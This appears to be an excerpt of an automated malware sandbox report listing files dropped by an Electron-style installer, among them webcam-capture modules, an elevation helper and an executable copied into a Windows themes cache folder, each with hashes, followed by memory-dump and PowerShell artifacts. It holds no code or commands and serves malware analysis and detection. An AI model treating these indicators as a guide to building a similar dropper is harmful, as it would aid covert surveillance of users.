SHA512 e8e709612a5ea81d2822e0025b7306f38571f2cec2ca72ac5a8ab852a0e36a0f5bc7e00d0baf7ac7becc2c54dda3a17c52ec1cd67ce12b14d91b6ae0b726d556

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\it.pak

MD5 5aa225aad4f9fe6d05ec24905a827d88
SHA1 f6d5ed337bd8e9cc3b962d3a498e3430fbf6de22
SHA256 96e02ab6937a1f1cb58762159761a737ce0e1dcd6a253554392baf4389326eab
SHA512 3fa928f19bdf65b8fbb274b478a801821b15c01224c113a8d7f6121a077b432c0cc84eefd9028a76adea9fa4bb65dcb868edfbd4368b1e4d477c49e187e4288a

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\mr.pak

MD5 f22c99fe6a838e333e8ee06a4d01296b
SHA1 c3542ea8dd45a2b387dd02fa5687948f135e10f2
SHA256 b03a3042f907aed13253ae8083d08f5fad59ff438d024b097276856e72526911
SHA512 882022c2cb985d85f96d52c9bcfeeb089d6ff30e66187ccf424ef622092b9d359a51bdef1fb6ac3b9d3409aa79d37ca737ba7f3ed8b9cdaabfe04d90a7c8bc15

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\ml.pak

MD5 04b2540c25990a5e0a9b227dcce6ae0d
SHA1 4f8ccd154f54dfb083d4d1a3ed0994842c8ab13e
SHA256 556165b8b54c6e21bc66d12b3f5be393136714467c427f7114f314d18ad3c661
SHA512 4cab47e42e8f5d4a83851871f97f3e1360c993ba530dbb4b4b736350779784bd83189e1195d3480ce87298bb8f9b7f249fefa7764d850e5b0002895609626785

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\ms.pak

MD5 6cfadaa784e687e6dadbcd80e631bc9b
SHA1 481acb75f525055bf4e45ecabe0eadcb9c492106
SHA256 fb5e125dd5e1f21e8df229d22cb3d1f9078bd79bbddca352899248f2a8b21b71
SHA512 0d7da5a90fe9372bc704ab8cdc8cbfb14d323cafdef856987e2d9e34d980196c03985e25099f5d1bcb10c97f040f4766e2c3713718649bb3f43914a77f0dbb39

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\nb.pak

MD5 b61e42f66d581b6a8929cdf5fb10662e
SHA1 6f06fa9ee092fbcb61bbd668734fb3b92cfb549a
SHA256 1b17dcde8fc7308d926fbe0faa83dfc9ffe2efc5715e9afd557dde839ad98b7e
SHA512 79b82346c3f133a6ba44148a8432ad4e08e2805187b759509cb386bc800fd20215592c07d953812c243f0b1d5e1354245f2cb42b2b3eb6c87280bcb4008dbe97

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\nl.pak

MD5 cf6b1cbfd669e9461553974ba37a475e
SHA1 b33867e9bc7fd88ca98a76dc4bd756bcf18887aa
SHA256 9a83ad866ad7fd9d65ecbc1e95c276cfce27e8257c76a16950fd14971e66b864
SHA512 e463029bb37f6bb3ff5cb6281f64291ada1b785fa33137e7aedfc7b5e409e99c75a91e7cf9b6c0933e970f70c14861190de66fc5d68925b687a6f5da02e21077

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\pl.pak

MD5 644c0ace25d6e532b56510a736c6bc2c
SHA1 1bd0fec952107b493da04c46423da634ff3e1504
SHA256 2ff9e382a31783285b7d85676e629e2f6db26bb9536ed17b7fbe5ac61a895ec7
SHA512 9a1f1e884c2f214b8b0c63543809ddd4ba0fd533f1d8434e926051f3db434f60cc4df2462c2a43254b2a9685b3869eef49463c212892e417c82c3a7b497e3559

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\pt-BR.pak

MD5 88ad860c73676ffb4025b5c691f29942
SHA1 3c5e5b999ea7153ccdd1b4cc7b6162de3456b558
SHA256 25f0bb0b0230d99a9064d52668636f3be85903bf27a68124d79a2fe93c30fe0e
SHA512 41589bb9ab1b8307f62ceb4e6493d7903731a3e63807e0044379c4acdda881c21839234f5f1b8ad1af732bfee6231c0556ce92e582505379ed949980185bb750

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\ro.pak

MD5 24b01a438a3ab9699d4ca97c081b5e82
SHA1 0d0b082544d23425a74199fb0a6c11192f0bdf7d
SHA256 38290b1c9712296d82ea1681ef95544a1eef4872289134b11e50af735e6deaca
SHA512 43199772312156f4633c4202499cde8f808e5e632c2013ec1129acee01a3f184e86df2616626173178efe04b6f0773ad9a0e8b8cc6a735d23d68dcfe9dfd945b

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\pt-PT.pak

MD5 ecd84b296d3bb312ee18e21017311986
SHA1 f5625523f85c10723750834a54ff59a2dd886fb3
SHA256 fcfaa9c44c445876c286388b6a1abc1df949f3dda3d64fb57d6e0d54a05cdb94
SHA512 e95b74238220024cdd0bd1c0f18beadbbe427d76cd8d6b32d5700adcd34ffb068ad0bf75404921485c8077f395f5111cd40d5dfe2b5b8f34c62e6fc80b507456

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\ru.pak

MD5 75457b95d2bb03891232dae7db886387
SHA1 e5a7569df7f91533703626d167ecc8cddbd27205
SHA256 e0894d3aa3f8e0f8ac457a3300001d4e1dcf95980712f8c8e9c845eb4c2bbfa6
SHA512 9813239cb162cec24cb81cffdae2df06889782813d917da186ae40df6dae64477467e4b32ead2d714bc1de671538d4c1fde990d83d3ee69e0932f17226687a78

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\sk.pak

MD5 b35daa0bd9627ca88b413a5af7c6b4a4
SHA1 d5efdcbc7ca17de29f3075f6434f31ab2e895826
SHA256 f47bc1f7f5ab64681d0b152e1a019da60f0ef057ee8bf2ccede019dc4030c177
SHA512 48abb6ca2290820db2898b05820bb25e70fb1292c816eb0c8f17b3c5452de9fff7027d216d2bf413900f408f44ed4ac99151b28142a212c5cff8dfe229e87b9b

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\sl.pak

MD5 e015b6f5042be2dc96a4e23dcf035502
SHA1 7946509eed8db1e4c1f3da99ffe7155c86fdb4d6
SHA256 99536d1bc73eec81d5bebbff641ea195544ee5e3a41bb17ddcedf9cde9b141d4
SHA512 b2a2eaae93c506a053862bf1cde02eee53b3ea2e2fe4c964c51dbacb8b44de820a779311cfe01458e2f08f88bce1172e8c5e1e6d28cd3a355ff84baa00023b8f

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\sv.pak

MD5 41e76f7775fc9a2d6e3c02c46e9b32f6
SHA1 088c15c74a68bee69682bf89c31055332b68c84a
SHA256 2533676479e9469ffcdaabcb47d3e39bebfe7ae2b80f70784e918a8827439e13
SHA512 6cde752d748c4772b533c8894f18134e5842113f8c7590b44a7dfa088aed65b232361fd16170df3b0d738066dbc3a769847adf4dd8ba42de63c9c2b33f9beb6b

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\sr.pak

MD5 af7083f2a4bd95dcbe792efade352662
SHA1 dc69aa831836016f6e66c6079931503d534a7862
SHA256 e3b80d9fdd420a05d66cc12e685ac94500106dd51a555bbfa2d085094f81e8dd
SHA512 342400ba94f6cd08152f96aa2b905184fab429c38cedb4bcb4ac0c503169a9ecd47aef208b4d7ffae08b0c0afa7aa089347a20739379d05f3e4e111be842b8c4

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\th.pak

MD5 43edd25f67ce6e6cea5373009ff0a1f8
SHA1 ed72ca6620cf23837e1334be50ccf616806bc5a2
SHA256 287897cf3df2db1cf59b872e6575ba8dfcaa0c1f68c17a9c91da6c4490adb8b0
SHA512 7160a72bd2e6b0ffa71e5d279995cc8be24a87cd9386eb29ab0eee79b8e607f5d824a11b6b4e3ef4c0f851a9d485a9642cb6adaa65c07933dca6e6f2c0052fc7

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\te.pak

MD5 793a87d41cde6e6d1bb086284f69733b
SHA1 d887e3842b664f55b7308427aa6f5bf0b352d879
SHA256 5cdabd1ad41e8048f2cc6b1615e68b99159daa1aa6706b939447c1811bf0e255
SHA512 7c2e53baa387480eed45315bd9d53856ca46e5777ecdc9c29a0de7b0ad04beb6cbb8b5df0aa7c306395fda563037e06bea1ca70e433ce5a3ccc2ec184dfda972

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\ta.pak

MD5 31dada843d0b4f9a66b184cb6d7b8b92
SHA1 0320b31981043c6e4c17470bf2ff4c7488553511
SHA256 457070b35c813175f5a7b630478073e478ff2bf23915dd3dc7a5b3b339cc2b0b
SHA512 c5b6ea595d3154fd9fe03f49a19f78eb4068718ce005b18a165d491459a290c29956b02a109ce2c314746773760c8e5c0d7064f384c65a572c78109f03538860

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\sw.pak

MD5 99e385ebc1ef8d3daddb3a171fa79edf
SHA1 3164804dfe9d9b5e891abafe92e5ba67d2b5d4d1
SHA256 8ec45ac391a085d531fb21815086c2da4841aa016653cb4f8484cfc2615d6c01
SHA512 797c105fecef1e15870aa101e3fa1835d5a467a9059c03b3636c54934d1de263ab7f23599e21d9787cb3849c7cb7d29f5bdd8ae9ad10fda8015c1392462e94c0

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\tr.pak

MD5 40491896ad21543f339467186c5efb40
SHA1 695dde7cc35056dcbf0a533aff8299d4c6b61bd8
SHA256 43e99e132acaba88971b81a43531845dc7fc3a1e0794c3373de7d9a50a5655aa
SHA512 18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\uk.pak

MD5 d791b1ecf2931b2fb0c31aac170c7cdc
SHA1 02be115a9ff94fe5250651b6de4323eafc44fce1
SHA256 ffae6286d44c8e219ef90d411ad8746159a6ff8ea610e2a651147a3956696a22
SHA512 3a2edb8069e4a9734ce5e02b7c3de3c968c5bbc116f17f52f97e2bb2c78485c456c4f0cc952686c1aa17b7ee4d326a1dda698afafc63c79d842ca3905181a8da

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\zh-TW.pak

MD5 c2c35fcedc3708b5bcadf36587393002
SHA1 31d72402cbd44ceb921cedd806259c2cd14e411f
SHA256 cfe4c2c5eb131fd92e0d11f912714c5a9a048833ef3ffbe32679b3d58da8f8ac
SHA512 9ba3ea2d569d1d3ef09e94d7e66f843c8804368c4d016b6289e7dba002f7d2d50884a76c93eef879d87abcf8b36dd3e682b7bd3a18b2b5a969256cef672abf01

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\zh-CN.pak

MD5 098d656a4f4bd8240bed10e7678186c7
SHA1 0c19ab62b4262f1b51558e8aaa79e7741f73393a
SHA256 a55f568ad3a8854cec25699484f55024501c8a0967738ba694e073151e5981c7
SHA512 084538ce774233ca6d4393bb42239b0b85e11bd73dd19ba47e55796ca19848941b037510c0fca4ac08b4b2e0ccbc9b4ae72ef88a3e841738dd211961dc53c1e2

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\locales\vi.pak

MD5 69c8796439192577f48bd249175aaf37
SHA1 97c52088ca69dada593db0e42b2135d264646454
SHA256 d7fdb53592de803a5fbcd8561c4918f1562f92fc8a3fd0039a2a1a7b76a8ecc2
SHA512 65eb7cb15291474ec7f9354775e59bcf334c90ddf3498ebd184e4c47118308421b2405bfa679e4b3a70ed1790e167c109fc2c72e89c3e31b5378cae975424144

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\resources\app.asar

MD5 8b620da2df08fb2d0131a71c712ce8f8
SHA1 4598baab1c3b6ce548da417ddb8578e59cc94cb6
SHA256 e7f1260f26d0a4ad40f9ee79b9f0f91a07b3edbe2e9173d978f9725f6ae71711
SHA512 65e8faca74ea18891751a54486816b827eceda4b080df4755e5f0b943a8db2281e2e206cd7fa90ce14d12123d456b9182afeb4b7b7ab1424dbbb9591f38478e8

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 16a12bdc986207390dd79d658a6b2263
SHA1 b4b41f62cbc1e1ede786c6e30e11df8e61750bad
SHA256 50a8dd2f292bea9190204a42de067a34d5cbbec53746d40fe5b067fc85190bac
SHA512 d20394028c5d3ca46bb4879cac40da07b7d857f9a4a834bb4db4bd047f1a3265a80e1f7528244da6ee97c2f3e0cb5b2e51bc88eeb382a027939c2188e66dcdd9

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 c0b36d56d83e601bf246f7709a8c5f9d
SHA1 b025a6070f7d61c7d1827856d2d4043834fd23f2
SHA256 45bb5e1f8dd87129ac0a75c78f8f29d06e3ac182a00fc5199b692068f1e05a53
SHA512 e429ae63bd8a7d5a936a638783511693e8fbbc91d97779b3d4dd3f0880f1c8a820106bfb57cf7ee6b3639f19165de87bbe127aadd81218689fc6c8fada2106d1

\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\swiftshader\libEGL.dll

MD5 19dc9ee70e7765bb63a66b6826e8ecb7
SHA1 1a12f983f8b35cc2955d30657971f113c47dc164
SHA256 83d5719abee35e051d984510e1d5d9317a109031698814742b59bdbbe7d4e30f
SHA512 1fda2bcc4b2e70987ca6011ab2534007ae4f752016d29a588aaae839bb25c35e03773f220b6a8e926cf2643997e7d4c0f28743304269b2c55642ce12934def68

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nscFDE9.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 c20c205c6f8d70a5e1351a4041a3ec9f
SHA1 e1b2a763dd6c42439656e4e55aba0f3610ff3784
SHA256 bbcbb170242d9ff1b56680a80b1f8755df1135f9c714535ff3b3f575442f38dc
SHA512 dffd59d775dbb89cd886a2212fb9fe4cf0b2bdd7f2c00f8dc7c6b2287053b4971c8c6c033109ff1f90cdacea082e44d3c19fa76325d24976420c418218e701f1

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

MD5 95d7c304c6b4a626e03f679f77fa0ae4
SHA1 46a584e60baeaab416d48531de313cca025dca0e
SHA256 941973afa64fd593bc04d5fac87d09d8ba74fff74627f3f19fbf9841beb5f33a
SHA512 598e2f820896badc5fa096005ef128ad8d9fb04b85f61c2248b0b3754e6ae37c29a47a6e5cefb4dbdc8306565fc4427943c2b24503af2da771fd15b4ba1b1a90

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\icudtl.dat

MD5 16759c46d25e2065db0df499e5487d74
SHA1 710711bea3b811141653fc2dfbed9d7924812c0f
SHA256 2bf30adccbfb1fa3ae1ba4c6ebecaa9fa659f1fa38ebe84ce1bc7477b2de0e21
SHA512 5a892c771d937229b9bf0fc8e30eef1e717aed21daa8197aa67cf88b112ec2af3528f27d49ce17cca1dbd2781020ece8c48c83bf518a18502e781cb61443e541

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\resources\app.asar

MD5 9bf714bafe3727477aa2a703d41079fb
SHA1 dc7cc69deb812e9751df025fc179e764d30d7ed1
SHA256 72c294cca8795855bdbb658057eda83ab4e66a4160411c085dfee80916ee09a0
SHA512 f83abb0969c0d09a85b283bca746f8f57de1cdd210e4a2496e8fa1d8945058e444e84f26137a598e373801e20c5adfbe4354624c3c2756d2e17018879f4d8520

\Users\Admin\AppData\Local\Temp\4bb9197e-66af-448b-8297-8f90f598a188.tmp.node

MD5 3072b68e3c226aff39e6782d025f25a8
SHA1 cf559196d74fa490ac8ce192db222c9f5c5a006a
SHA256 7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01
SHA512 61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

\Users\Admin\AppData\Local\Temp\1f5fa4bb-b69c-4fbc-9cfa-56932fab7130.tmp.node

MD5 783eca791a4716c8d14a0da9bc90a32e
SHA1 0f376219cb958f9aedcde502569bb4fda8564754
SHA256 3d0dc887c3f15cb1ad94231c37bbd787780c81bb4fc9dc01c06434eb5abbcf7a
SHA512 5d3eab36c7195763861647fc16d34fa7e36135a5daef789bc5f4cc160974540af65522ee2411834c821c4d51a415c3543a51c6996c5d45eb4e63da1697aaa4ff

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\resources.pak

MD5 24b792d9bbb0996032101e225f5c0816
SHA1 c0593f8ce53c6187f61ed770e7681481a422c373
SHA256 214e17ca64091985fe2647e65b9cd78ebff2c6760b22c6f1c60712435c3b0dcf
SHA512 c944712b7e272be5c1fddd5e6205a7ce662b43f0ea86b57202b733d3a3d9055047a9ce1823baee0eb5bb2857e3f94ff1fb3fd50a24eff622deeee43ffb2171b9

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

MD5 f713a4805486f18d24027cd8dd7deba6
SHA1 6994a2049c94729f1139fb676dbbee962a086903
SHA256 8db6505d4a336b2edb1977f25235791d69074f29b68f7e78c7faa45a6dadba64
SHA512 ed99f23b2a021d90d79419b170bcfc4f598fcdce98a23b34fa53838abc0685a87ce4aac96181f6dc942042da9614f61f5aaec56ad385a1482a82ad11a783ca88

memory/2764-583-0x00007FFBD7B30000-0x00007FFBD7B31000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

MD5 828055c71ff8d4fab187314113ae1b00
SHA1 84d2f32aced71fc0a3df8db58d1ad1f0a4289e04
SHA256 aefe14c2600efa1e958865f3de70212184d7942cf6065f2c8a8142f91001a717
SHA512 1c17e022799709c203f508d77d79a123b9b9eea7f282b1d9e8023c759dbc3e316dae3daeafe1b3eb4967d35e1e02dbbb91f0d8d750c91f52385d85f0d655764e

\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\libGLESv2.dll

MD5 83fad7420f60f58e3e4f51299f3fd9d9
SHA1 6dc31980627f584e96a1238ab3fdce15456c48d2
SHA256 4fab5a91ef0caf067513d5f511e11f9c9da113164933ae0b8288d3f3c763058f
SHA512 380b0823b2c7239750a2cca7f9780d83599dee4effee7fec4b11afbb5226d31bb76785b22f1bcc460c4058244daaf37ed370f283e7552cf020720c5960bedc64

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\libglesv2.dll

MD5 b232ec943c04a28014e9ca00304019f9
SHA1 1293cd52f9d460cbd9bdf1e8628159fb1fa91f64
SHA256 cf405ef913150d5e52852f8026afc8ad4cb665d72ecfac90f25a11720c0f3615
SHA512 185ccdb68babe56c861353e305aa8e2a26ebaaa59c37da4ca374466a2b4b5bd98ffb8f2e30236f72b6b8728ae40a7157f5b85e813d94b0ecded70701c42d6a6a

\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\d3dcompiler_47.dll

MD5 ce37826b135e8ffac65adbe08fe90b03
SHA1 d2fdf0e4a67986c7adfac0387641c6e6e872b227
SHA256 f0c073064d42b6b8b1be8ab4fbe740649cd696150371b8ba0d0f28cdf44ab602
SHA512 91e83dd73809f6b7ddc7dec2577232c1c683acf0d31152ffbb607941429cabef8580b40707ffa02c721d36b5ef8654d6b8c7af8ab687ddc5608b69be8c438468

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\D3DCompiler_47.dll

MD5 30049cfaccd1cd28ae462bc3ad2b729c
SHA1 838cf59660e641511a663d57c896959daef01099
SHA256 09486b1f07d2a9dfea994b3a92c58a748595aa73b54f6d0b98f1c89cbeeca550
SHA512 58615ff819a033e572f8eef76672a31c7a4f89649cc74694a7da5838bcddd04ede2383df373821a30a406bf94304f48f07ca85a2cb0273b3404b7d089459f295

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

MD5 ca946957f66729240ffd078c6ed1a7e1
SHA1 136864b5504295027f55886f56de039a0bcdd4d1
SHA256 7d73bd407236c4a144aeb46b29a215bcbfdafe30f0ccd50de4e279928cc45909
SHA512 6f48a0f29c8d65d17c575a9d8517b799c64f15d8d1d52ef40787818c1f923600223b065307d75a3d0942bb40c771857f54e0a70b65d7d7965e7c8392e50e3456

\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\ffmpeg.dll

MD5 51fa53323e3cc9899b48919bdee5fa50
SHA1 b69afd08fc5df4cc9fee90f1f8d32136f6466e65
SHA256 76194478cb2aeebd71a33653f24fbbd074f04f2f1af0c5786f17c821d96f9890
SHA512 234e9c4f92ca0311bd0aa645d46420b72aaa2452dbf0e973198199b2ffe04379052fd23b9232f9e1da8852f26c00129c6bd892a7033a510cb29508096f363008

memory/656-633-0x0000027A9AFA0000-0x0000027A9AFC2000-memory.dmp

memory/656-636-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

memory/656-638-0x0000027A82980000-0x0000027A82990000-memory.dmp

memory/656-639-0x0000027A82980000-0x0000027A82990000-memory.dmp

memory/656-637-0x0000027A9B150000-0x0000027A9B1C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a3xsoapu.zb5.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/656-658-0x0000027A82980000-0x0000027A82990000-memory.dmp

memory/656-659-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 17286868c0a043ae5d2ff5798b6a3163
SHA1 b83b23cd57c7fb2c937f5bc18aeb7ddc955b5401
SHA256 40321e18ed0b9eb7e3bc937d3e207ea2039ff45267483ddb4a51f7974475dac6
SHA512 e15c11982c0569a389a7dbd0889edd1ef9a8ffb21c0e8ffadebc10e1353f4485524b18ca8e041c66c98d05fb984544da122755e6c2a25728453aeaf4175bdee1

memory/444-667-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

memory/444-669-0x000001B668A70000-0x000001B668A80000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8da1621d7c175e2092e9d508675b78fa
SHA1 d2fe8bb379e508d485fd5c447f410aceac50f264
SHA256 2f981647f2a9acbf7635ad5a990d0dc084a917b9d6dc872041b8ea6c766bae3a
SHA512 1efb2881f053b8201280ec0814939354f90f925484ca2ade5cf2279ceadecf469f704147ce44d106f4b7fa29d0214a92ae12b5bf4c4b286d513c936b839e59a4

memory/444-687-0x000001B668A70000-0x000001B668A80000-memory.dmp

memory/444-691-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

memory/3744-706-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

memory/3744-708-0x000001A6F2A30000-0x000001A6F2A40000-memory.dmp

memory/3744-707-0x000001A6F2A30000-0x000001A6F2A40000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 41d0044247a49a35c0af089ae1daa6aa
SHA1 dda2f8e882e442dd11b4c5e8b316daf9251f6c98
SHA256 7027dfc78bba309e7dc3c3f7ef0a2bb2e34e20f053874b3b7eea37e7c6b79f04
SHA512 32fad843417f667852e0dd6511fb869b47555b9d4ba7befac5112b418e556cf8b7c4f52708f69fd181123181c3a63eefaf97237f9b5ef0e23533c5c43d78cecf

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe

MD5 fe50684641a17b137fa124c41208842f
SHA1 be7baa36e75c1437f62c34ffc9e1e822b65db801
SHA256 b3621bfa973228cd9778881812673c96860929002cd2b6ba820cabe552f3e0f9
SHA512 badf11756505da6cb0ef9d58346d6e5b75eb70e4bf9b71b30453d2960d738569f24b598768324c76cae97e7eb3c5cb9e46b13d322fa6b84d5ca29e44081f9ac1

memory/3744-723-0x000001A6F2A30000-0x000001A6F2A40000-memory.dmp

memory/3744-726-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

memory/2852-740-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

memory/2852-742-0x00000208E8C40000-0x00000208E8C50000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a6426089504d9f87c1e7bf3da98e2726
SHA1 d689d1c26a83a2ddd649aad7e982d5c2b458dba1
SHA256 473e35df502a5c89ed1c54d835006810d536950c54af0e5124dc4b5b3d6280b0
SHA512 b2b13365010978cbdd2ee01e2853037c5e48928e2d1cf577daade24b84736fef5d70c5bce7601ca275c6a9558120258da5844fba9f09e68ff83477a21c863d7f

memory/2852-758-0x00000208E8C40000-0x00000208E8C50000-memory.dmp

memory/2852-862-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 2648a85eb614e6f72ced6d3f6b1c5b3a
SHA1 f18b0cd0282292f2da79e6bec41fd53bce139380
SHA256 006c6f2fc3645c3696e8924daf11b220310513d7b392e74c71f8a9b90e289f3c
SHA512 a501e3f02b20bb0c63ed690e3f98a363a4d37804a51c09160055e9b6c7060200ea2e078f5f837ad61bf6c5b4d09cdcc16a4c9dcee7b54c968c7fd8f0d9489e7f

memory/10668-880-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

memory/10668-881-0x00000186EED80000-0x00000186EED90000-memory.dmp

memory/10668-883-0x00000186EED80000-0x00000186EED90000-memory.dmp

memory/10752-907-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

memory/3444-914-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

memory/9616-919-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

memory/10752-920-0x00000215A9210000-0x00000215A9220000-memory.dmp

memory/3936-921-0x0000014849010000-0x0000014849020000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e4fff4b879ac12387b4497ecf6aef670
SHA1 09ad6a3cf7ce4d75f15874ab18065ef18d9a88e6
SHA256 60b2598592dfc5329fb8e98cd3d90832103d8e460d70616cb26149f918626bfd
SHA512 2fa8916523dbcd1dd4479273c934fd97c7157ce43e14c13d6e552124987816cde41d104dcbac89a984a5aad85e149fbd96edac13e3871e670f75558a55058f4c

memory/3444-923-0x000001F053C30000-0x000001F053C40000-memory.dmp

memory/3444-922-0x000001F053C30000-0x000001F053C40000-memory.dmp

memory/9616-925-0x0000024AB3230000-0x0000024AB3240000-memory.dmp

memory/9616-926-0x0000024AB3230000-0x0000024AB3240000-memory.dmp

memory/3936-928-0x00007FFBBB750000-0x00007FFBBC13C000-memory.dmp

